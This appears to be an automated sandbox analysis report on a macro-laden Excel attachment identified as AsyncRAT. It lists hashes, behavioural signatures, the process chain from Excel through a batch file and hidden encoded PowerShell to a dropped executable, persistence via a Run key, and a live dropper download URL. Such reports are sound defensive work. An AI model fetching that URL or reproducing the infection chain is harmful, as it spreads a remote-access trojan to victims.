Analysis

  • max time kernel: 151s
  • max time network: 159s
  • platform: windows10_x64
  • resource: win10v20210408
  • submitted: 10-10-2021 11:48

General

  • Target: ORDER 002110109A.xlsm
  • Size: 388KB
  • MD5: fddb915231bd05bdb40250bd9ca9327a
  • SHA1: 95e69dffccc8c93611de153fd9993faefc4b0f5f
  • SHA256: 06e223bb2af0e00e3c5c7d2a0574e0cf69716f82432665221d49f62a8613b5ed
  • SHA512: da06766a2de1c0008ee9ed1d575bf8500a09ba511d056beb2c84e44ce7457d7e319c156695176de87247ca7faac68ea65af6216d47075f67341e6c2b61b13b43

Malware Config

Extracted

  • Language: ps1
  • Deobfuscated
  • URLs (exe.dropper): http://transfer.sh/get/ii6Fqb/word.exe

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Async RAT payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Deletes itself 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ORDER 002110109A.xlsm"
    1⤵
    • Deletes itself
    • Checks processor information in registry
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: RenamesItself
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:804
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Wzjokpltbfr.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1884
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc 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
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1240
        • C:\Users\Admin\AppData\Roaming\Kgwugrfmaukbcbkgumu.exe
          "C:\Users\Admin\AppData\Roaming\Kgwugrfmaukbcbkgumu.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:744
          • C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
            C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
            5⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            PID:2676

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  • Persistence: Registry Run Keys / Startup Folder (T1060), 1 hit
  • Defense Evasion: Modify Registry (T1112), 1 hit
  • Discovery: Query Registry (T1012), 2 hits
  • Discovery: System Information Discovery (T1082), 2 hits

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Kgwugrfmaukbcbkgumu.exe.log
    MD5: 605f809fab8c19729d39d075f7ffdb53
    SHA1: c546f877c9bd53563174a90312a8337fdfc5fdd9
    SHA256: 6904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556
    SHA512: 82cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3

  • C:\Users\Admin\AppData\Local\Temp\Kgwugrfmaukbcbkgumu.exe
    MD5: 4adb3a47d33b76506499d2be6b60351a
    SHA1: 5305fdc90c3ba06867d3765e826c1fa1312d7e0f
    SHA256: d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2
    SHA512: 9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

  • C:\Users\Admin\AppData\Roaming\Kgwugrfmaukbcbkgumu.exe
    MD5: 4adb3a47d33b76506499d2be6b60351a
    SHA1: 5305fdc90c3ba06867d3765e826c1fa1312d7e0f
    SHA256: d748773cdc253a048d98daf2dfbeed332f5609b1718c64362b6739f5ef1fc7b2
    SHA512: 9f7974c7f722b2fab301ca64abf9bf243ba1e4d958c1d5cdc3be0db12acfe7101165e5c950d8571d20910afce4982b58b7625c42b6526b93dccd3687141f78dd

  • C:\Users\Admin\Documents\Wzjokpltbfr.bat
    MD5: 29e9b22feef3c9266a3228072aff9cca
    SHA1: a7632e340c2929ed5dace6c266250cebc3c13ab2
    SHA256: 04f1edaab7365adc160f7a50e9376ae3cfa717900765fad12fbd67c5fc767684
    SHA512: 775587f577aa0be54a33ecac0ded78d4780cfeca3973867f296c543f37f21008e353772c096d4e4992298a995868a4715197950976dde2b3f55339c6d8c49f82

  • memory/744-321-0x0000000000000000-mapping.dmp
  • memory/744-340-0x0000000005380000-0x0000000005381000-memory.dmp (Filesize: 4KB)
  • memory/804-114-0x00007FFA6EBC0000-0x00007FFA6EBD0000-memory.dmp (Filesize: 64KB)
  • memory/804-117-0x00007FFA6EBC0000-0x00007FFA6EBD0000-memory.dmp (Filesize: 64KB)
  • memory/804-120-0x000001F12FE10000-0x000001F12FE12000-memory.dmp (Filesize: 8KB)
  • memory/804-121-0x000001F12FE10000-0x000001F12FE12000-memory.dmp (Filesize: 8KB)
  • memory/804-115-0x00007FFA6EBC0000-0x00007FFA6EBD0000-memory.dmp (Filesize: 64KB)
  • memory/804-116-0x00007FFA6EBC0000-0x00007FFA6EBD0000-memory.dmp (Filesize: 64KB)
  • memory/804-118-0x00007FFA6EBC0000-0x00007FFA6EBD0000-memory.dmp (Filesize: 64KB)
  • memory/804-119-0x000001F12FE10000-0x000001F12FE12000-memory.dmp (Filesize: 8KB)
  • memory/1240-292-0x0000000000000000-mapping.dmp
  • memory/1240-312-0x0000021C37D36000-0x0000021C37D38000-memory.dmp (Filesize: 8KB)
  • memory/1240-302-0x0000021C37D33000-0x0000021C37D35000-memory.dmp (Filesize: 8KB)
  • memory/1240-301-0x0000021C37D30000-0x0000021C37D32000-memory.dmp (Filesize: 8KB)
  • memory/1884-290-0x0000000000000000-mapping.dmp
  • memory/2676-334-0x000000000040C75E-mapping.dmp
  • memory/2676-341-0x00000000052E0000-0x00000000052E1000-memory.dmp (Filesize: 4KB)